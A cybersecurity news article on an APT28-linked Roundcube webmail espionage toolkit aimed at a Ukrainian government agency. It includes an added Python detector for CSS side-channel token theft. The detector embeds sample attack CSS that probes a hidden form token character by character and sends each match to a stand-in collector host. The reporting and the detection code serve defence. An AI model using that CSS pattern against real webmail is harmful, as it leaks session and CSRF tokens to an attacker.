Cybersecurity researchers have uncovered a sophisticated toolkit believed to be used by the Russian-linked hacking group APT28 in a campaign targeting Ukrainian government email systems.
The operation, dubbed “Operation Roundish,” was discovered in January 2026 by researchers at Hunt.io after an exposed open directory was identified on the server 203.161.50[.]145. The directory contained what appears to be a complete exploitation framework designed to target vulnerabilities in the Roundcube webmail platform, which threat actors frequently target because of its wide adoption.
Analysis of the exposed infrastructure revealed a comprehensive operational toolkit that included development and production cross-site scripting (XSS) payloads, a Flask-based command-and-control server, CSS injection tooling, and operator artifacts such as bash history logs.
Researchers also discovered a Go-based Linux implant deployed within a compromised Ukrainian web application, indicating that the attackers were able to establish persistence within at least one targeted environment.
The toolkit was designed to support a wide range of espionage activities against webmail systems. Researchers found capabilities enabling attackers to harvest user credentials, establish persistent mail forwarding rules, conduct bulk email exfiltration, steal address books, and extract two-factor authentication secrets. They also found an archive containing more than 1,070 files of exfiltrated victim data.
Technical analysis revealed strong similarities between the Roundish toolkit and the campaign known as Operation RoundPress previously documented by ESET. Researchers identified fourteen overlapping tactics, techniques, and procedures (TTPs), seven of which are considered distinctive and rarely observed outside of this actor’s operations. Based on the overlaps, analysts assess with medium-high confidence that the activity is linked to APT28.
Over the past several years, APT28 has systematically targeted webmail platforms in cyber-espionage operations aimed at government and defense organizations. The campaigns have exploited vulnerabilities in platforms such as Roundcube, Horde, MDaemon, and Zimbra. In many cases, attackers rely on XSS vulnerabilities to gain access to email accounts and collect messages, contacts, and authentication data.
While Roundish shares core characteristics with earlier operations, the toolkit also introduces capabilities not previously documented in APT28’s webmail-focused campaigns. One component implements a CSS selector side-channel technique designed to progressively extract CSRF tokens, enabling attackers to bypass certain webmail protections. Researchers also identified modules capable of stealing stored credentials from Chrome and Firefox browsers.
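A CSS selector side channel of the kind described above leaks a hidden form value by pairing substring attribute selectors (`[value^="..."]`) with a remote `url()` fetch, so a mail gateway or Roundcube administrator can hunt for that pairing in inbound HTML. The following detector is an added example, not code from the Hunt.io report or from the Roundish toolkit; the HTML body, the `_token` field name and the collector host are constructed, and the regex-based CSS parsing is an assumption adequate for triage, not a full CSS parser.

```python
import re
from dataclasses import dataclass

# Constructed sample: an HTML mail body whose <style> block probes a hidden
# form field one leading character at a time and reports each match to an
# external host through a background-image fetch. Field name and host are made up.
SAMPLE_HTML = """<html><head><style>
body { font-family: sans-serif; }
input[name="_token"][value^="a"] { background: url("https://collector.example.invalid/t/a"); }
input[name="_token"][value^="b"] { background: url("https://collector.example.invalid/t/b"); }
</style></head><body><p>Quarterly report attached.</p></body></html>"""

STYLE_BLOCK = re.compile(r"<style[^>]*>(.*?)</style>", re.I | re.S)
RULE = re.compile(r"([^{}]+)\{([^{}]*)\}", re.S)
# Substring-matching attribute selectors (^=, $=, *=) applied to a value attribute
VALUE_PROBE = re.compile(r"\[\s*value\s*[\^\$\*]=", re.I)
# Any url() whose target is an absolute http(s) URL, i.e. a fetch to a remote host
REMOTE_URL = re.compile(r"url\(\s*['\"]?(https?://[^'\")\s]+)", re.I)


@dataclass(frozen=True)
class Finding:
    selector: str
    url: str


def find_css_token_probes(html: str) -> list[Finding]:
    """Return every CSS rule that both probes a value attribute by substring
    and triggers a remote fetch: the signature of a CSS exfiltration side channel.
    Rules that do only one of the two (ordinary styling, or a remote image
    without a value probe) are not reported, which keeps false positives low."""
    findings = []
    for block in STYLE_BLOCK.findall(html):
        for selector, body in RULE.findall(block):
            if VALUE_PROBE.search(selector):
                for url in REMOTE_URL.findall(body):
                    findings.append(Finding(selector.strip(), url))
    return findings


def exfil_hosts(html: str) -> set[str]:
    """Distinct remote hosts contacted by probe rules, for blocking or log hunting."""
    return {re.sub(r"^https?://([^/]+).*", r"\1", f.url) for f in find_css_token_probes(html)}
```

A mail body that only styles text, or only loads a remote image, produces no findings; every hit names the selector and the collector URL, which can be fed into proxy or DNS log searches for the same host.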
The architecture of the toolkit also appears more advanced than previously observed tooling associated with the group. Analysts noted that the framework is capable of running up to six simultaneous operations, significantly increasing the potential data collection impact of each execution compared with earlier tools that typically supported only two or three parallel actions. Bash history recovered from the exposed server further suggests that operators were actively developing scripts to detect containerized environments.
Evidence from the recovered infrastructure confirms that the operation targeted the Roundcube webmail instance used by the State Migration Service of Ukraine at mail.dmsu.gov.ua. The exposed directory ultimately allowed researchers to recover four main components of the Roundish toolkit: a credential phishing module named serverlast.py, XSS exploitation payloads stored as newworker.js and worklast.js, a CSS injection server called roundcube-css-exploit.js, and the Go-based persistence implant httd.
Earlier this week, ESET shared details of another APT28-linked campaign using custom malware implants, including a modified version of the open-source Covenant post-exploitation tool, to spy on Ukrainian organizations. The researchers noted that the group appears to have resumed advanced malware development.